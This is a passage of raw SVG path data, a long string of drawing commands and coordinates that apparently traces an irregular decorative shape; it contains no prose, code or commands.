.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.6-.2-8.8-.5,10.4.4.7-.4,5.1-.5,2.3.4,8.5.3,5.6,0,.1.3-4.7-.1-4.4-.2,1.2-.4,14.8-.2,9.1-.7-3.4-.1,1.2.5-4,.2-5.8-.3.3-.7.5-1-8.6-.4-11.4-1-9.7-1.5.7.5,2.7.3,7.3.4-.1-.7-2.1-1.2,2.7-1.7.5.2,0,1.1,2.1.8-2.1-.6,3.6-.5,6.8-.2-3.1-.6,2.5-.5-2.3-1,1.8,0,1.8-.1,4.2,0s3.4.3,3.2.5c5.9-.2,6.5-.3,10.6-.6-3.7-.2-4,.3-5.6,0,1.2-.4-3.4-.5-3.5-.8,6.7.2,3.8-.5,6.4-.6,6.4.6-4.8.8,2.5,1.3-.3-.3,1.6-.6,6.6-.4,1.1.3-1.1.8,2.19.9,2.2-.5-.69-1,8.9-.9-6.3-.3-.4-.9-5.4-1.4,2.7-.1,2.81.1,5